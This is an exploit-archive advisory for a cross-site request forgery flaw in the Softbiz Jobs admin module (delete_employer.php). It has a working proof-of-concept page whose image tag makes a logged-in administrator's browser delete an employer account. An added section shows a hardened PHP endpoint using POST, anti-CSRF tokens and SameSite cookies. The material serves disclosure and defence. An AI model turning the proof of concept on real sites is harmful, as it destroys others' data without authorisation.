
Softbiz Jobs - Cross-Site Request Forgery

Author: pratul agrawal
type: webapps
platform: php
port: 
date_added: 2010-02-22 
date_updated:  
verified: 1 
codes: OSVDB-62545 
tags: 
aliases:  
screenshot_url:  
application_url: 

=======================================================================
                  Softbiz Jobs CSRF Vulnerability
=======================================================================

                               by

                          Pratul Agrawal


# Vulnerability found in  Admin module (admin/delete_employer.php)

# email         Pratulag@yahoo.com

# company       aksitservices

# Credit by     Pratul Agrawal

# Download      http://www.softbizscripts.com/

# Script        softbizscripts



# Proof of concept

Proof-of-concept page that deletes a registered employer account through cross-site request forgery. The admin deletion endpoint performs the delete on a plain GET request and requires no anti-CSRF token, so any page that embeds the URL in an image tag causes the victim's browser to issue the request with the administrator's session cookie attached.

...................................................................................................................

<html>
  <body>
    <!-- the browser fetches the "image" with the admin's cookies; replace [USER ID] with the target id -->
    <img src="http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID]" />
  </body>
</html>

...................................................................................................................



If an administrator who is logged in to the admin panel loads this page, the browser sends the GET request together with the admin session cookie and the employer with the given id is deleted. Refresh the admin's employer list afterwards to confirm; in the author's test the account with id=20 was removed.
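The controls whose absence makes the image-tag PoC above work are a POST-only state change, a session-bound anti-CSRF token, and a same-origin check. The following is an added example of a hardened delete endpoint written for this page; it is not Softbiz Jobs' code, and the session key, table and column names, PDO DSN and credentials are assumptions.

```php
<?php
// Added example (not Softbiz Jobs' code): a hardened admin "delete employer"
// endpoint. Session key names, the employers table/column and the PDO DSN are
// assumptions chosen for illustration.
declare(strict_types=1);

session_start([
    'cookie_httponly' => true,
    'cookie_secure'   => true,
    'cookie_samesite' => 'Strict',   // PHP >= 7.3: cookie is withheld on cross-site requests
]);

// Only an authenticated administrator may reach this script (assumed session key).
if (empty($_SESSION['admin_id'])) {
    http_response_code(403);
    exit('Forbidden');
}

// Per-session anti-CSRF token, created once and embedded in the admin UI's forms.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a missing or mismatched token fails closed.
function csrf_valid(?string $submitted): bool
{
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: a request forged from another site carries a foreign Origin
// (or Referer); an <img> fetch from the attacker's page would fail this check.
function same_origin(): bool
{
    $origin   = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    $host     = parse_url($origin, PHP_URL_HOST);
    $expected = parse_url('http://' . ($_SERVER['HTTP_HOST'] ?? ''), PHP_URL_HOST);
    return is_string($host) && is_string($expected) && strcasecmp($host, $expected) === 0;
}

$isPost = ($_SERVER['REQUEST_METHOD'] === 'POST');
$id = filter_input($isPost ? INPUT_POST : INPUT_GET, 'id', FILTER_VALIDATE_INT,
                   ['options' => ['min_range' => 1]]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Bad id');
}

if (!$isPost) {
    // GET never changes state: it only renders a confirmation form carrying the
    // token. This is exactly the step the vulnerable endpoint skipped, which is
    // why a bare <img src="...delete_employer.php?id=N"> could perform the delete.
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    echo "<form method=\"post\" action=\"delete_employer.php\">\n"
       . "  <input type=\"hidden\" name=\"id\" value=\"{$id}\">\n"
       . "  <input type=\"hidden\" name=\"csrf_token\" value=\"{$token}\">\n"
       . "  <button type=\"submit\">Delete employer {$id}</button>\n"
       . "</form>\n";
    exit;
}

// POST: refuse unless the token and the request origin both check out.
if (!csrf_valid($_POST['csrf_token'] ?? null) || !same_origin()) {
    http_response_code(403);
    exit('CSRF check failed');
}

// Parameterised delete against the assumed schema.
$pdo = new PDO('mysql:host=localhost;dbname=seojobs', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$stmt = $pdo->prepare('DELETE FROM employers WHERE id = :id');
$stmt->execute([':id' => $id]);

// Rotate the token after a successful state change so a leaked value is single-use.
unset($_SESSION['csrf_token']);
echo "Employer {$id} deleted.";
```

With this in place the PoC page still causes the administrator's browser to fetch `delete_employer.php?id=N`, but the request is a GET, so at most the confirmation form is rendered into a broken image; with `SameSite=Strict` the session cookie is not even sent. The token check is the primary control; the Origin/Referer comparison is a second layer and should not be relied on alone, since some clients strip those headers.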


#If you have any questions, comments, or concerns, feel free to contact me.